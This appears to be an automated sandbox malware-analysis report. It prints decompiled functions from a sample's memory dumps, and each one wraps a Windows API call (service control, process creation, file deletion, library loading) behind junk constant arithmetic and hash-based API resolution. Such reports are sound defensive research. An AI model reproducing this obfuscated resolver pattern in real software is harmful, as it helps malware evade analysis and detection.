                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E001FAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001E602B(_t21);
                                                      				_v12 = 0xcc49;
                                                      				_v12 = _v12 << 6;
                                                      				_v12 = _v12 >> 2;
                                                      				_v12 = _v12 ^ 0x000ca988;
                                                      				_v8 = 0x5d85;
                                                      				_v8 = _v8 | 0xb9d19a55;
                                                      				_v8 = _v8 * 0xd;
                                                      				_v8 = _v8 ^ 0x6fa87272;
                                                      				E001F07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                                      				_t27 = DeleteFileW(_a12); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001FAAA8
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E001E5FB2(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001E602B(_t21);
                                                      				_v12 = 0x33d;
                                                      				_v12 = _v12 + 0xc3dc;
                                                      				_v12 = _v12 | 0x39ccfb02;
                                                      				_v12 = _v12 ^ 0x39ccf342;
                                                      				_v8 = 0xe8d9;
                                                      				_v8 = _v8 * 0x16;
                                                      				_v8 = _v8 | 0x4145347f;
                                                      				_v8 = _v8 ^ 0x9035ef96;
                                                      				_v8 = _v8 ^ 0xd1609914;
                                                      				E001F07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                                      				_t27 = CloseServiceHandle(_a4); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 001E6025
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Executed Functions

                                                      C-Code - Quality: 62%
                                                      			E001D2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t30;
                                                      				void* _t39;
                                                      				signed int _t41;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(0);
                                                      				_push(0);
                                                      				E001D602B(_t30);
                                                      				_v12 = 0x5e3c;
                                                      				_t41 = 0x63;
                                                      				_v12 = _v12 / _t41;
                                                      				_t42 = 0x2f;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x000064be;
                                                      				_v8 = 0x74da;
                                                      				_v8 = _v8 | 0xfefeeaea;
                                                      				_v8 = _v8 >> 0xc;
                                                      				_v8 = _v8 ^ 0x000fb531;
                                                      				E001E07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                                      				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                                      				return _t39;
                                                      			}










                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001D29DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E001DC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t29;
                                                      				intOrPtr* _t33;
                                                      				void* _t34;
                                                      
                                                      				E001D602B(_t29);
                                                      				_v28 = 0x4fe02f;
                                                      				_v24 = 0x232390;
                                                      				_v20 = 0xf8460;
                                                      				_v16 = 0;
                                                      				_v12 = 0xf625;
                                                      				_v12 = _v12 >> 6;
                                                      				_v12 = _v12 >> 0xa;
                                                      				_v12 = _v12 + 0xffffcc6f;
                                                      				_v12 = _v12 ^ 0xffffa5b6;
                                                      				_v8 = 0xe5cd;
                                                      				_v8 = _v8 + 0xffffae4d;
                                                      				_v8 = _v8 | 0xf8bbefe7;
                                                      				_v8 = _v8 ^ 0xf8bbcc9a;
                                                      				_t33 = E001E07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                                      				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                                      				return _t34;
                                                      			}













                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001DC762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E001D1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _t33;
                                                      				struct HINSTANCE__* _t40;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				E001D602B(_t33);
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v24 = 0x1b2eda;
                                                      				_v20 = 0x33a3b7;
                                                      				_v12 = 0x98c;
                                                      				_v12 = _v12 + 0xb426;
                                                      				_v12 = _v12 + 0x5beb;
                                                      				_t42 = 0x63;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x00000fce;
                                                      				_v8 = 0x120e;
                                                      				_v8 = _v8 + 0xfffffcb8;
                                                      				_v8 = _v8 + 0xffffefaa;
                                                      				_v8 = _v8 >> 5;
                                                      				_v8 = _v8 ^ 0x07ff9a02;
                                                      				E001E07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                                      				_t40 = LoadLibraryW(_a12); // executed
                                                      				return _t40;
                                                      			}












                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 001D1096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: 6c9247c1494e0430e7af192e2c9ebdad8a4dc037f7a170ec8d45a2d22dfa5ef9
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction Fuzzy Hash: F1015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E001D4859() {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      
                                                      				_v12 = 0xafe2;
                                                      				_v12 = _v12 * 0x42;
                                                      				_v12 = _v12 + 0xffffdd89;
                                                      				_v12 = _v12 ^ 0x002d198d;
                                                      				_v8 = 0x5b09;
                                                      				_v8 = _v8 | 0xa1ea9544;
                                                      				_v8 = _v8 * 0x12;
                                                      				_v8 = _v8 ^ 0x6283d9c1;
                                                      				E001E07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                                      				ExitProcess(0);
                                                      			}







                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 001D48B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: 4d233150a7b1b8d0ca9ed02e51ebcc8e11366db29454cee23ee02343d5930ca8
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: A0F017B0E05209FBDB04CFE8CA5699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 66%
                                                      			E001E4F7D(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t17;
                                                      				int _t24;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001D602B(_t17);
                                                      				_v12 = 0xddd8;
                                                      				_v12 = _v12 * 0x48;
                                                      				_v12 = _v12 ^ 0x003e66d8;
                                                      				_v8 = 0xcb35;
                                                      				_v8 = _v8 ^ 0x7b88573c;
                                                      				_v8 = _v8 * 0x59;
                                                      				_v8 = _v8 ^ 0xf27e4a21;
                                                      				E001E07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                                      				_t24 = CloseHandle(_a4); // executed
                                                      				return _t24;
                                                      			}








                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 001E4FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: 6704b2815e5b6340f86946b0b895de4bfb083cb0925a4a1645cfd3f49927c494
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: 50F037B0C1120CFFDB04DFA4D98289EBFBAEB44300F208199E804AB250D3715B509B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 21%
                                                      			E001E976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t34;
                                                      				int _t39;
                                                      				struct _PROCESS_INFORMATION* _t48;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t48 = __edx;
                                                      				_push(0);
                                                      				_push(_a68);
                                                      				_push(0);
                                                      				_push(_a60);
                                                      				_push(_a56);
                                                      				_push(_a52);
                                                      				_push(0);
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E001D602B(_t34);
                                                      				_v12 = 0xaff9;
                                                      				_v12 = _v12 | 0xcee54bd1;
                                                      				_v12 = _v12 + 0x6ed6;
                                                      				_v12 = _v12 ^ 0xcee61221;
                                                      				_v8 = 0x6229;
                                                      				_v8 = _v8 ^ 0x42aa9f31;
                                                      				_v8 = _v8 >> 2;
                                                      				_v8 = _v8 ^ 0x10aad83f;
                                                      				E001E07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                                      				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                                      				return _t39;
                                                      			}









                                                      APIs
                                                      • CreateProcessW.KERNEL32(001D591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001D591A), ref: 001E9816
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: c55db46f124b2cc675f9668ff90ed3c07b71415c0d78f6d611415f865274e5c6
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: 0C11B372901188BFDF1A9FD6DC0ACDF7F7AEF89750F104148FA1556120D2728AA0EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 31%
                                                      			E001DB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t32;
                                                      				void* _t38;
                                                      				long _t47;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a48);
                                                      				_t47 = __edx;
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(_a36);
                                                      				_push(_a32);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(0);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(0);
                                                      				E001D602B(_t32);
                                                      				_v8 = 0xfd14;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 * 0x7a;
                                                      				_v8 = _v8 >> 9;
                                                      				_v8 = _v8 ^ 0x00002bef;
                                                      				_v12 = 0x4f26;
                                                      				_v12 = _v12 | 0xe7e97f76;
                                                      				_v12 = _v12 ^ 0xe7e94dbb;
                                                      				E001E07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                                      				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                                      				return _t38;
                                                      			}









                                                      APIs
                                                      • CreateFileW.KERNELBASE(001E0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001E0668,?,?,?,?), ref: 001DB5FD
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: 37c1b1c4d25d484248efe105347f02daa2207a1a560edb8fe11a26f7b2631849
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: 0611C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E001E981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      				void* _t28;
                                                      				void* _t34;
                                                      				long _t37;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a16);
                                                      				_t34 = __edx;
                                                      				_t37 = __ecx;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E001D602B(_t22);
                                                      				_v12 = 0xe68;
                                                      				_v12 = _v12 * 0x39;
                                                      				_v12 = _v12 ^ 0xd1b1d871;
                                                      				_v12 = _v12 ^ 0xd1b2fb7e;
                                                      				_v8 = 0x629e;
                                                      				_v8 = _v8 + 0xfffff5da;
                                                      				_v8 = _v8 | 0xbef7b77b;
                                                      				_v8 = _v8 ^ 0xbef79fc3;
                                                      				E001E07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                                      				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                                      				return _t28;
                                                      			}










                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001D87F2,0000CAAE,0000510C,AD82F196), ref: 001E989B
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: b7709b50ae51164d8aeb1307988349b9148569f66681926d56ec9366ccc2218f
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: BA019A72801208FBDB04EFD5D846CDFBF79EF85310F108189F908A6220E6715B619BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E001E7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				int _t31;
                                                      				signed int _t33;
                                                      				struct _SHFILEOPSTRUCTW* _t40;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_t40 = __ecx;
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001D602B(_t24);
                                                      				_v8 = 0xa117;
                                                      				_t33 = 0x76;
                                                      				_v8 = _v8 / _t33;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 ^ 0x210fe703;
                                                      				_v8 = _v8 ^ 0x210fdcea;
                                                      				_v12 = 0xf1e9;
                                                      				_v12 = _v12 << 9;
                                                      				_v12 = _v12 ^ 0x01e3a445;
                                                      				E001E07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                                      				_t31 = SHFileOperationW(_t40); // executed
                                                      				return _t31;
                                                      			}










                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001E7C67
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: e7037390f7e7bacdf7c2bd971d6ce7ccbf9953c3af2e8e0c38516eaa01a5caa6
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: 28014BB190120CFFEB09DFA4C84A8DEBBB9EF54314F208199F405A7240EBB15F509B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 52%
                                                      			E001DF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				void* _t29;
                                                      				int _t35;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a20);
                                                      				_t35 = __ecx;
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001D602B(_t24);
                                                      				_v12 = 0xd5a7;
                                                      				_v12 = _v12 ^ 0x994cba9d;
                                                      				_v12 = _v12 ^ 0x994c19d3;
                                                      				_v8 = 0xac88;
                                                      				_v8 = _v8 << 3;
                                                      				_v8 = _v8 >> 8;
                                                      				_v8 = _v8 + 0xebed;
                                                      				_v8 = _v8 ^ 0x0000ab82;
                                                      				E001E07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                                      				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                                      				return _t29;
                                                      			}









                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001DF6D8
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction ID: 25db9c83cd685e5ff74837f7b26bcfb941d860824d8c17e223a5a90ae44bee76
                                                      • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction Fuzzy Hash: 7F01E5B6901208BFEF059F94DC468DF7F75EB19324F148188F90462250D7B25E61DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E001DB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t23;
                                                      				intOrPtr* _t27;
                                                      				void* _t28;
                                                      
                                                      				E001D602B(_t23);
                                                      				_v12 = 0x9431;
                                                      				_v12 = _v12 >> 7;
                                                      				_v12 = _v12 ^ 0x0000160f;
                                                      				_v8 = 0xc972;
                                                      				_v8 = _v8 ^ 0x829e0126;
                                                      				_v8 = _v8 + 0x4512;
                                                      				_v8 = _v8 + 0xffff18f9;
                                                      				_v8 = _v8 ^ 0x829e24c1;
                                                      				_t27 = E001E07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                                      				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                                      				return _t28;
                                                      			}









                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001DB759
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction ID: 4e94c54c4c2e972598a0f63784df660732168030f90fb273d613f908c69640ee
                                                      • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction Fuzzy Hash: DF0128B6941308FBEB45DF94DD06A9E7BB5EB18704F108188FA09661A0D3B25E20AB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E001EAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001D602B(_t21);
                                                      				_v12 = 0xcc49;
                                                      				_v12 = _v12 << 6;
                                                      				_v12 = _v12 >> 2;
                                                      				_v12 = _v12 ^ 0x000ca988;
                                                      				_v8 = 0x5d85;
                                                      				_v8 = _v8 | 0xb9d19a55;
                                                      				_v8 = _v8 * 0xd;
                                                      				_v8 = _v8 ^ 0x6fa87272;
                                                      				E001E07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                                      				_t27 = DeleteFileW(_a12); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001EAAA8
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction ID: 6cc9e9da56f875ccb929634986dd8fabee2daaccf13b632fb616f58897090f90
                                                      • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction Fuzzy Hash: 20F019B590020CFFDF08DF94DD4A99EBFB5EB45304F108198F915A6250D3B69F549B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
